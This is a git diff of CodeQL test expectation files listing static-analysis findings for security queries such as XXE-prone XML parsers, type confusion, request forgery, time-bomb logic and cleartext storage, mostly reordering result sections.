| tests5.cpp:40:25:40:38 | *call to createLSParser | XML parser | -| tests5.cpp:59:2:59:2 | *p | tests5.cpp:55:25:55:38 | *call to createLSParser | tests5.cpp:59:2:59:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:55:25:55:38 | *call to createLSParser | XML parser | -| tests5.cpp:77:2:77:5 | *g_p2 | tests5.cpp:70:17:70:30 | *call to createLSParser | tests5.cpp:77:2:77:5 | *g_p2 | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:70:17:70:30 | *call to createLSParser | XML parser | -| tests5.cpp:83:2:83:2 | *p | tests5.cpp:81:25:81:38 | *call to createLSParser | tests5.cpp:83:2:83:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:81:25:81:38 | *call to createLSParser | XML parser | -| tests5.cpp:89:2:89:2 | *p | tests5.cpp:81:25:81:38 | *call to createLSParser | tests5.cpp:89:2:89:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:81:25:81:38 | *call to createLSParser | XML parser | -| tests.cpp:17:2:17:2 | *p | tests.cpp:15:23:15:43 | call to XercesDOMParser | tests.cpp:17:2:17:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:15:23:15:43 | call to XercesDOMParser | XML parser | -| tests.cpp:31:2:31:2 | *p | tests.cpp:28:23:28:43 | call to XercesDOMParser | tests.cpp:31:2:31:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:28:23:28:43 | call to XercesDOMParser | XML parser | -| tests.cpp:39:2:39:2 | *p | tests.cpp:35:23:35:43 | call to XercesDOMParser | tests.cpp:39:2:39:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:35:23:35:43 | call to XercesDOMParser | XML parser | -| tests.cpp:56:2:56:2 | *p | tests.cpp:51:23:51:43 | call to XercesDOMParser | tests.cpp:56:2:56:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. 
| tests.cpp:51:23:51:43 | call to XercesDOMParser | XML parser | -| tests.cpp:60:2:60:2 | *p | tests.cpp:51:23:51:43 | call to XercesDOMParser | tests.cpp:60:2:60:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:51:23:51:43 | call to XercesDOMParser | XML parser | -| tests.cpp:69:2:69:2 | *p | tests.cpp:66:23:66:43 | call to XercesDOMParser | tests.cpp:69:2:69:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:66:23:66:43 | call to XercesDOMParser | XML parser | -| tests.cpp:80:2:80:2 | *p | tests.cpp:73:23:73:43 | call to XercesDOMParser | tests.cpp:80:2:80:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:73:23:73:43 | call to XercesDOMParser | XML parser | -| tests.cpp:88:3:88:3 | *q | tests.cpp:85:24:85:44 | call to XercesDOMParser | tests.cpp:88:3:88:3 | *q | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:85:24:85:44 | call to XercesDOMParser | XML parser | -| tests.cpp:104:3:104:3 | *q | tests.cpp:100:24:100:44 | call to XercesDOMParser | tests.cpp:104:3:104:3 | *q | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:100:24:100:44 | call to XercesDOMParser | XML parser | -| tests.cpp:113:2:113:2 | *p | tests.cpp:122:23:122:43 | call to XercesDOMParser | tests.cpp:113:2:113:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:122:23:122:43 | call to XercesDOMParser | XML parser | -| tests.cpp:117:2:117:2 | *p | tests.cpp:122:23:122:43 | call to XercesDOMParser | tests.cpp:117:2:117:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:122:23:122:43 | call to XercesDOMParser | XML parser | edges | tests2.cpp:20:17:20:31 | *new | tests2.cpp:22:2:22:2 | *p | provenance | | | tests2.cpp:20:17:20:31 | call to SAXParser | tests2.cpp:20:17:20:31 | *new | provenance | | 
@@ -216,3 +185,34 @@ nodes | tests.cpp:128:18:128:18 | *q | semmle.label | *q | subpaths | tests.cpp:126:18:126:18 | *q | tests.cpp:112:39:112:39 | *p | tests.cpp:112:39:112:39 | *p | tests.cpp:126:18:126:18 | test10_doParseB output argument | +#select +| tests2.cpp:22:2:22:2 | *p | tests2.cpp:20:17:20:31 | call to SAXParser | tests2.cpp:22:2:22:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests2.cpp:20:17:20:31 | call to SAXParser | XML parser | +| tests2.cpp:37:2:37:2 | *p | tests2.cpp:33:17:33:31 | call to SAXParser | tests2.cpp:37:2:37:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests2.cpp:33:17:33:31 | call to SAXParser | XML parser | +| tests2.cpp:51:2:51:2 | *p | tests2.cpp:49:12:49:12 | call to SAXParser | tests2.cpp:51:2:51:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests2.cpp:49:12:49:12 | call to SAXParser | XML parser | +| tests3.cpp:25:2:25:2 | *p | tests3.cpp:23:21:23:53 | *call to createXMLReader | tests3.cpp:25:2:25:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:23:21:23:53 | *call to createXMLReader | XML parser | +| tests3.cpp:38:2:38:6 | *p_3_3 | tests3.cpp:35:24:35:56 | *call to createXMLReader | tests3.cpp:38:2:38:6 | *p_3_3 | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:35:24:35:56 | *call to createXMLReader | XML parser | +| tests3.cpp:56:2:56:6 | *p_3_5 | tests3.cpp:48:24:48:56 | *call to createXMLReader | tests3.cpp:56:2:56:6 | *p_3_5 | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:48:24:48:56 | *call to createXMLReader | XML parser | +| tests3.cpp:63:2:63:2 | *p | tests3.cpp:60:21:60:53 | *call to createXMLReader | tests3.cpp:63:2:63:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. 
| tests3.cpp:60:21:60:53 | *call to createXMLReader | XML parser | +| tests3.cpp:70:2:70:2 | *p | tests3.cpp:67:21:67:53 | *call to createXMLReader | tests3.cpp:70:2:70:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:67:21:67:53 | *call to createXMLReader | XML parser | +| tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | XML parser | +| tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | XML parser | +| tests4.cpp:46:34:46:68 | ... \| ... | tests4.cpp:46:34:46:68 | ... \| ... | tests4.cpp:46:34:46:68 | ... \| ... | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:46:34:46:68 | ... \| ... | XML parser | +| tests4.cpp:77:34:77:38 | flags | tests4.cpp:77:34:77:38 | flags | tests4.cpp:77:34:77:38 | flags | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:77:34:77:38 | flags | XML parser | +| tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | XML parser | +| tests5.cpp:29:2:29:2 | *p | tests5.cpp:27:25:27:38 | *call to createLSParser | tests5.cpp:29:2:29:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. 
| tests5.cpp:27:25:27:38 | *call to createLSParser | XML parser | +| tests5.cpp:43:2:43:2 | *p | tests5.cpp:40:25:40:38 | *call to createLSParser | tests5.cpp:43:2:43:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:40:25:40:38 | *call to createLSParser | XML parser | +| tests5.cpp:59:2:59:2 | *p | tests5.cpp:55:25:55:38 | *call to createLSParser | tests5.cpp:59:2:59:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:55:25:55:38 | *call to createLSParser | XML parser | +| tests5.cpp:77:2:77:5 | *g_p2 | tests5.cpp:70:17:70:30 | *call to createLSParser | tests5.cpp:77:2:77:5 | *g_p2 | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:70:17:70:30 | *call to createLSParser | XML parser | +| tests5.cpp:83:2:83:2 | *p | tests5.cpp:81:25:81:38 | *call to createLSParser | tests5.cpp:83:2:83:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:81:25:81:38 | *call to createLSParser | XML parser | +| tests5.cpp:89:2:89:2 | *p | tests5.cpp:81:25:81:38 | *call to createLSParser | tests5.cpp:89:2:89:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:81:25:81:38 | *call to createLSParser | XML parser | +| tests.cpp:17:2:17:2 | *p | tests.cpp:15:23:15:43 | call to XercesDOMParser | tests.cpp:17:2:17:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:15:23:15:43 | call to XercesDOMParser | XML parser | +| tests.cpp:31:2:31:2 | *p | tests.cpp:28:23:28:43 | call to XercesDOMParser | tests.cpp:31:2:31:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:28:23:28:43 | call to XercesDOMParser | XML parser | +| tests.cpp:39:2:39:2 | *p | tests.cpp:35:23:35:43 | call to XercesDOMParser | tests.cpp:39:2:39:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. 
| tests.cpp:35:23:35:43 | call to XercesDOMParser | XML parser | +| tests.cpp:56:2:56:2 | *p | tests.cpp:51:23:51:43 | call to XercesDOMParser | tests.cpp:56:2:56:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:51:23:51:43 | call to XercesDOMParser | XML parser | +| tests.cpp:60:2:60:2 | *p | tests.cpp:51:23:51:43 | call to XercesDOMParser | tests.cpp:60:2:60:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:51:23:51:43 | call to XercesDOMParser | XML parser | +| tests.cpp:69:2:69:2 | *p | tests.cpp:66:23:66:43 | call to XercesDOMParser | tests.cpp:69:2:69:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:66:23:66:43 | call to XercesDOMParser | XML parser | +| tests.cpp:80:2:80:2 | *p | tests.cpp:73:23:73:43 | call to XercesDOMParser | tests.cpp:80:2:80:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:73:23:73:43 | call to XercesDOMParser | XML parser | +| tests.cpp:88:3:88:3 | *q | tests.cpp:85:24:85:44 | call to XercesDOMParser | tests.cpp:88:3:88:3 | *q | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:85:24:85:44 | call to XercesDOMParser | XML parser | +| tests.cpp:104:3:104:3 | *q | tests.cpp:100:24:100:44 | call to XercesDOMParser | tests.cpp:104:3:104:3 | *q | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:100:24:100:44 | call to XercesDOMParser | XML parser | +| tests.cpp:113:2:113:2 | *p | tests.cpp:122:23:122:43 | call to XercesDOMParser | tests.cpp:113:2:113:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:122:23:122:43 | call to XercesDOMParser | XML parser | +| tests.cpp:117:2:117:2 | *p | tests.cpp:122:23:122:43 | call to XercesDOMParser | tests.cpp:117:2:117:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. 
| tests.cpp:122:23:122:43 | call to XercesDOMParser | XML parser | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/TaintedCondition.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/TaintedCondition.expected index 5a1e5dbcbc5b..fc3a964b2bf3 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/TaintedCondition.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/TaintedCondition.expected @@ -1,5 +1,3 @@ -#select -| test.cpp:24:10:24:35 | ! ... | test.cpp:20:29:20:47 | *call to getenv | test.cpp:24:10:24:35 | ! ... | Reliance on $@ to raise privilege at $@. | test.cpp:20:29:20:47 | *call to getenv | an environment variable | test.cpp:25:9:25:27 | ... = ... | ... = ... | edges | test.cpp:20:29:20:47 | *call to getenv | test.cpp:20:29:20:47 | *call to getenv | provenance | | | test.cpp:20:29:20:47 | *call to getenv | test.cpp:24:10:24:35 | ! ... | provenance | TaintFunction | @@ -8,3 +6,5 @@ nodes | test.cpp:20:29:20:47 | *call to getenv | semmle.label | *call to getenv | | test.cpp:24:10:24:35 | ! ... | semmle.label | ! ... | subpaths +#select +| test.cpp:24:10:24:35 | ! ... | test.cpp:20:29:20:47 | *call to getenv | test.cpp:24:10:24:35 | ! ... | Reliance on $@ to raise privilege at $@. | test.cpp:20:29:20:47 | *call to getenv | an environment variable | test.cpp:25:9:25:27 | ... = ... | ... = ... | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-843/TypeConfusion.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-843/TypeConfusion.expected index a805d06e1e22..6e18306bcd29 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-843/TypeConfusion.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-843/TypeConfusion.expected 
@@ -1,13 +1,3 @@ -#select -| test.cpp:28:25:28:55 | p | test.cpp:27:13:27:18 | new | test.cpp:28:25:28:55 | p | Conversion from $@ to $@ is invalid. | test.cpp:1:8:1:9 | S1 | S1 | test.cpp:11:8:11:21 | Not_S1_wrapper | Not_S1_wrapper | -| test.cpp:33:12:33:30 | p | test.cpp:32:13:32:30 | new | test.cpp:33:12:33:30 | p | Conversion from $@ to $@ is invalid. | test.cpp:11:8:11:21 | Not_S1_wrapper | Not_S1_wrapper | test.cpp:1:8:1:9 | S1 | S1 | -| test.cpp:67:12:67:31 | a | test.cpp:66:15:66:21 | new | test.cpp:67:12:67:31 | a | Conversion from $@ to $@ is invalid. | test.cpp:55:8:55:10 | Cat | Cat | test.cpp:60:8:60:10 | Dog | Dog | -| test.cpp:128:24:128:59 | s2 | test.cpp:127:12:127:17 | new | test.cpp:128:24:128:59 | s2 | Conversion from $@ to $@ is invalid. | test.cpp:102:8:102:9 | S2 | S2 | test.cpp:119:8:119:20 | Not_S2_prefix | Not_S2_prefix | -| test.cpp:145:28:145:68 | s1_2 | test.cpp:143:14:143:19 | new | test.cpp:145:28:145:68 | s1_2 | Conversion from $@ to $@ is invalid. | test.cpp:1:8:1:9 | S1 | S1 | test.cpp:131:8:131:23 | HasSomeBitFields | HasSomeBitFields | -| test.cpp:159:14:159:33 | a | test.cpp:153:9:153:15 | new | test.cpp:159:14:159:33 | a | Conversion from $@ to $@ is invalid. | test.cpp:60:8:60:10 | Dog | Dog | test.cpp:55:8:55:10 | Cat | Cat | -| test.cpp:189:25:189:45 | u64 | test.cpp:187:15:187:24 | new | test.cpp:189:25:189:45 | u64 | Conversion from $@ to $@ is invalid. | test.cpp:175:8:175:13 | UInt64 | UInt64 | test.cpp:184:8:184:22 | UInt8_with_more | UInt8_with_more | -| test.cpp:218:30:218:65 | p | test.cpp:217:13:217:18 | new | test.cpp:218:30:218:65 | p | Conversion from $@ to $@ is invalid. | test.cpp:1:8:1:9 | S1 | S1 | test.cpp:212:8:212:26 | UnrelatedStructSize | UnrelatedStructSize | -| test.cpp:227:29:227:63 | p | test.cpp:226:13:226:18 | new | test.cpp:227:29:227:63 | p | Conversion from $@ to $@ is invalid. 
| test.cpp:1:8:1:9 | S1 | S1 | test.cpp:221:8:221:25 | TooLargeBufferSize | TooLargeBufferSize | edges | test.cpp:17:13:17:18 | new | test.cpp:17:13:17:18 | new | provenance | | | test.cpp:17:13:17:18 | new | test.cpp:18:21:18:47 | p | provenance | | 
@@ -114,3 +104,13 @@ nodes | test.cpp:226:13:226:18 | new | semmle.label | new | | test.cpp:227:29:227:63 | p | semmle.label | p | subpaths +#select +| test.cpp:28:25:28:55 | p | test.cpp:27:13:27:18 | new | test.cpp:28:25:28:55 | p | Conversion from $@ to $@ is invalid. | test.cpp:1:8:1:9 | S1 | S1 | test.cpp:11:8:11:21 | Not_S1_wrapper | Not_S1_wrapper | +| test.cpp:33:12:33:30 | p | test.cpp:32:13:32:30 | new | test.cpp:33:12:33:30 | p | Conversion from $@ to $@ is invalid. | test.cpp:11:8:11:21 | Not_S1_wrapper | Not_S1_wrapper | test.cpp:1:8:1:9 | S1 | S1 | +| test.cpp:67:12:67:31 | a | test.cpp:66:15:66:21 | new | test.cpp:67:12:67:31 | a | Conversion from $@ to $@ is invalid. | test.cpp:55:8:55:10 | Cat | Cat | test.cpp:60:8:60:10 | Dog | Dog | +| test.cpp:128:24:128:59 | s2 | test.cpp:127:12:127:17 | new | test.cpp:128:24:128:59 | s2 | Conversion from $@ to $@ is invalid. | test.cpp:102:8:102:9 | S2 | S2 | test.cpp:119:8:119:20 | Not_S2_prefix | Not_S2_prefix | +| test.cpp:145:28:145:68 | s1_2 | test.cpp:143:14:143:19 | new | test.cpp:145:28:145:68 | s1_2 | Conversion from $@ to $@ is invalid. | test.cpp:1:8:1:9 | S1 | S1 | test.cpp:131:8:131:23 | HasSomeBitFields | HasSomeBitFields | +| test.cpp:159:14:159:33 | a | test.cpp:153:9:153:15 | new | test.cpp:159:14:159:33 | a | Conversion from $@ to $@ is invalid. | test.cpp:60:8:60:10 | Dog | Dog | test.cpp:55:8:55:10 | Cat | Cat | +| test.cpp:189:25:189:45 | u64 | test.cpp:187:15:187:24 | new | test.cpp:189:25:189:45 | u64 | Conversion from $@ to $@ is invalid. | test.cpp:175:8:175:13 | UInt64 | UInt64 | test.cpp:184:8:184:22 | UInt8_with_more | UInt8_with_more | +| test.cpp:218:30:218:65 | p | test.cpp:217:13:217:18 | new | test.cpp:218:30:218:65 | p | Conversion from $@ to $@ is invalid. 
| test.cpp:1:8:1:9 | S1 | S1 | test.cpp:212:8:212:26 | UnrelatedStructSize | UnrelatedStructSize | +| test.cpp:227:29:227:63 | p | test.cpp:226:13:226:18 | new | test.cpp:227:29:227:63 | p | Conversion from $@ to $@ is invalid. | test.cpp:1:8:1:9 | S1 | S1 | test.cpp:221:8:221:25 | TooLargeBufferSize | TooLargeBufferSize | diff --git a/csharp/ql/test/experimental/CWE-918/RequestForgery.expected b/csharp/ql/test/experimental/CWE-918/RequestForgery.expected index 54c478d94373..d0e8e0281f84 100644 --- a/csharp/ql/test/experimental/CWE-918/RequestForgery.expected +++ b/csharp/ql/test/experimental/CWE-918/RequestForgery.expected @@ -3,6 +3,6 @@ edges nodes | RequestForgery.cs:12:52:12:54 | url : String | semmle.label | url : String | | RequestForgery.cs:14:66:14:68 | access to parameter url | semmle.label | access to parameter url | +subpaths problems | RequestForgery.cs:14:66:14:68 | access to parameter url | RequestForgery.cs:12:52:12:54 | url : String | RequestForgery.cs:14:66:14:68 | access to parameter url | The URL of this request depends on a $@. | RequestForgery.cs:12:52:12:54 | url | user-provided value | -subpaths diff --git a/csharp/ql/test/experimental/Security Features/backdoor/PotentialTimeBomb.expected b/csharp/ql/test/experimental/Security Features/backdoor/PotentialTimeBomb.expected index e5773327060f..95a491293ddb 100644 --- a/csharp/ql/test/experimental/Security Features/backdoor/PotentialTimeBomb.expected +++ b/csharp/ql/test/experimental/Security Features/backdoor/PotentialTimeBomb.expected 
@@ -1,3 +1,12 @@ +nodes +| test.cs:69:18:69:30 | access to local variable lastWriteTime : DateTime | semmle.label | access to local variable lastWriteTime : DateTime | +| test.cs:69:34:69:76 | call to method GetLastWriteTime : DateTime | semmle.label | call to method GetLastWriteTime : DateTime | +| test.cs:71:13:71:71 | call to method CompareTo | semmle.label | call to method CompareTo | +| test.cs:71:13:71:71 | call to method CompareTo : Int32 | semmle.label | call to method CompareTo : Int32 | +| test.cs:71:13:71:76 | ... >= ... | semmle.label | ... >= ... | +| test.cs:71:36:71:48 | access to local variable lastWriteTime | semmle.label | access to local variable lastWriteTime | +| test.cs:71:36:71:70 | call to method AddHours | semmle.label | call to method AddHours | +subpaths edges | test.cs:69:18:69:30 | access to local variable lastWriteTime : DateTime | test.cs:71:36:71:48 | access to local variable lastWriteTime | provenance | | | test.cs:69:34:69:76 | call to method GetLastWriteTime : DateTime | test.cs:69:18:69:30 | access to local variable lastWriteTime : DateTime | provenance | | 
@@ -8,16 +17,7 @@ edges | test.cs:71:36:71:70 | call to method AddHours | test.cs:71:13:71:71 | call to method CompareTo | provenance | | | test.cs:71:36:71:70 | call to method AddHours | test.cs:71:13:71:71 | call to method CompareTo : Int32 | provenance | | | test.cs:71:36:71:70 | call to method AddHours | test.cs:71:36:71:70 | call to method AddHours | provenance | | -nodes -| test.cs:69:18:69:30 | access to local variable lastWriteTime : DateTime | semmle.label | access to local variable lastWriteTime : DateTime | -| test.cs:69:34:69:76 | call to method GetLastWriteTime : DateTime | semmle.label | call to method GetLastWriteTime : DateTime | -| test.cs:71:13:71:71 | call to method CompareTo | semmle.label | call to method CompareTo | -| test.cs:71:13:71:71 | call to method CompareTo : Int32 | semmle.label | call to method CompareTo : Int32 | -| test.cs:71:13:71:76 | ... >= ... | semmle.label | ... >= ... | -| test.cs:71:36:71:48 | access to local variable lastWriteTime | semmle.label | access to local variable lastWriteTime | -| test.cs:71:36:71:70 | call to method AddHours | semmle.label | call to method AddHours | problems | test.cs:71:9:74:9 | if (...) ... | test.cs:69:34:69:76 | call to method GetLastWriteTime : DateTime | test.cs:71:13:71:71 | call to method CompareTo | Possible TimeBomb logic triggered by an $@ that takes into account $@ from the $@ as part of the potential trigger. | test.cs:71:13:71:71 | call to method CompareTo | call to method CompareTo | test.cs:71:36:71:70 | call to method AddHours | offset | test.cs:69:34:69:76 | call to method GetLastWriteTime | last modification time of a file | | test.cs:71:9:74:9 | if (...) ... | test.cs:69:34:69:76 | call to method GetLastWriteTime : DateTime | test.cs:71:13:71:71 | call to method CompareTo : Int32 | Possible TimeBomb logic triggered by an $@ that takes into account $@ from the $@ as part of the potential trigger. 
| test.cs:71:13:71:71 | call to method CompareTo | call to method CompareTo | test.cs:71:36:71:70 | call to method AddHours | offset | test.cs:69:34:69:76 | call to method GetLastWriteTime | last modification time of a file | | test.cs:71:9:74:9 | if (...) ... | test.cs:69:34:69:76 | call to method GetLastWriteTime : DateTime | test.cs:71:13:71:76 | ... >= ... | Possible TimeBomb logic triggered by an $@ that takes into account $@ from the $@ as part of the potential trigger. | test.cs:71:13:71:71 | call to method CompareTo | call to method CompareTo | test.cs:71:36:71:70 | call to method AddHours | offset | test.cs:69:34:69:76 | call to method GetLastWriteTime | last modification time of a file | -subpaths diff --git a/csharp/ql/test/experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.expected b/csharp/ql/test/experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.expected index 010a2877589c..b8074b4fa636 100644 --- a/csharp/ql/test/experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.expected +++ b/csharp/ql/test/experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.expected @@ -1,4 +1,4 @@ edges nodes -problems subpaths +problems diff --git a/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/UnsafeYearConstruction.expected b/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/UnsafeYearConstruction.expected index 60f88d172588..72846a3bea12 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/UnsafeYearConstruction.expected +++ b/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/UnsafeYearConstruction.expected 
@@ -1,7 +1,3 @@ -#select -| Program.cs:13:39:13:50 | ... - ... | Program.cs:13:39:13:50 | ... - ... | Program.cs:13:39:13:50 | ... - ... | This $@ based on a 'System.DateTime.Year' property is used in a construction of a new 'System.DateTime' object, flowing to the 'year' argument. | Program.cs:13:39:13:50 | ... - ... | arithmetic operation | -| Program.cs:17:37:17:43 | access to local variable endYear | Program.cs:15:27:15:38 | ... + ... : Int32 | Program.cs:17:37:17:43 | access to local variable endYear | This $@ based on a 'System.DateTime.Year' property is used in a construction of a new 'System.DateTime' object, flowing to the 'year' argument. | Program.cs:15:27:15:38 | ... + ... : Int32 | arithmetic operation | -| Program.cs:26:39:26:42 | access to parameter year | Program.cs:33:18:33:29 | ... - ... : Int32 | Program.cs:26:39:26:42 | access to parameter year | This $@ based on a 'System.DateTime.Year' property is used in a construction of a new 'System.DateTime' object, flowing to the 'year' argument. | Program.cs:33:18:33:29 | ... - ... : Int32 | arithmetic operation | edges | Program.cs:15:17:15:23 | access to local variable endYear : Int32 | Program.cs:17:37:17:43 | access to local variable endYear | provenance | | | Program.cs:15:27:15:38 | ... + ... : Int32 | Program.cs:15:17:15:23 | access to local variable endYear : Int32 | provenance | | 
@@ -16,3 +12,7 @@ nodes | Program.cs:26:39:26:42 | access to parameter year | semmle.label | access to parameter year | | Program.cs:33:18:33:29 | ... - ... : Int32 | semmle.label | ... - ... : Int32 | subpaths +#select +| Program.cs:13:39:13:50 | ... - ... | Program.cs:13:39:13:50 | ... - ... | Program.cs:13:39:13:50 | ... - ... | This $@ based on a 'System.DateTime.Year' property is used in a construction of a new 'System.DateTime' object, flowing to the 'year' argument. | Program.cs:13:39:13:50 | ... - ... | arithmetic operation | +| Program.cs:17:37:17:43 | access to local variable endYear | Program.cs:15:27:15:38 | ... + ... : Int32 | Program.cs:17:37:17:43 | access to local variable endYear | This $@ based on a 'System.DateTime.Year' property is used in a construction of a new 'System.DateTime' object, flowing to the 'year' argument. | Program.cs:15:27:15:38 | ... + ... : Int32 | arithmetic operation | +| Program.cs:26:39:26:42 | access to parameter year | Program.cs:33:18:33:29 | ... - ... : Int32 | Program.cs:26:39:26:42 | access to parameter year | This $@ based on a 'System.DateTime.Year' property is used in a construction of a new 'System.DateTime' object, flowing to the 'year' argument. | Program.cs:33:18:33:29 | ... - ... : Int32 | arithmetic operation | diff --git a/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.expected b/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.expected index b7daaaf26e7f..74b546faa65f 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.expected +++ b/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.expected 
@@ -1,13 +1,3 @@ -#select -| CleartextStorage.cs:15:50:15:59 | access to field accountKey | CleartextStorage.cs:15:50:15:59 | access to field accountKey | CleartextStorage.cs:15:50:15:59 | access to field accountKey | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:15:50:15:59 | access to field accountKey | access to field accountKey | -| CleartextStorage.cs:16:62:16:74 | call to method GetPassword | CleartextStorage.cs:16:62:16:74 | call to method GetPassword | CleartextStorage.cs:16:62:16:74 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:16:62:16:74 | call to method GetPassword | call to method GetPassword | -| CleartextStorage.cs:17:69:17:81 | call to method GetPassword | CleartextStorage.cs:17:69:17:81 | call to method GetPassword | CleartextStorage.cs:17:69:17:81 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:17:69:17:81 | call to method GetPassword | call to method GetPassword | -| CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | call to method GetAccountID | -| CleartextStorage.cs:26:21:26:33 | call to method GetPassword | CleartextStorage.cs:26:21:26:33 | call to method GetPassword | CleartextStorage.cs:26:21:26:33 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:26:21:26:33 | call to method GetPassword | call to method GetPassword | -| CleartextStorage.cs:34:26:34:38 | call to method GetPassword | CleartextStorage.cs:34:26:34:38 | call to method GetPassword | CleartextStorage.cs:34:26:34:38 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. 
| CleartextStorage.cs:34:26:34:38 | call to method GetPassword | call to method GetPassword | -| CleartextStorage.cs:94:21:94:33 | access to property Text | CleartextStorage.cs:94:21:94:33 | access to property Text | CleartextStorage.cs:94:21:94:33 | access to property Text | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:94:21:94:33 | access to property Text | access to property Text | -| CleartextStorage.cs:95:21:95:29 | access to property Text | CleartextStorage.cs:95:21:95:29 | access to property Text | CleartextStorage.cs:95:21:95:29 | access to property Text | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:95:21:95:29 | access to property Text | access to property Text | -| CleartextStorage.cs:96:21:96:29 | access to property Text | CleartextStorage.cs:96:21:96:29 | access to property Text | CleartextStorage.cs:96:21:96:29 | access to property Text | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:96:21:96:29 | access to property Text | access to property Text | edges nodes | CleartextStorage.cs:15:50:15:59 | access to field accountKey | semmle.label | access to field accountKey | 
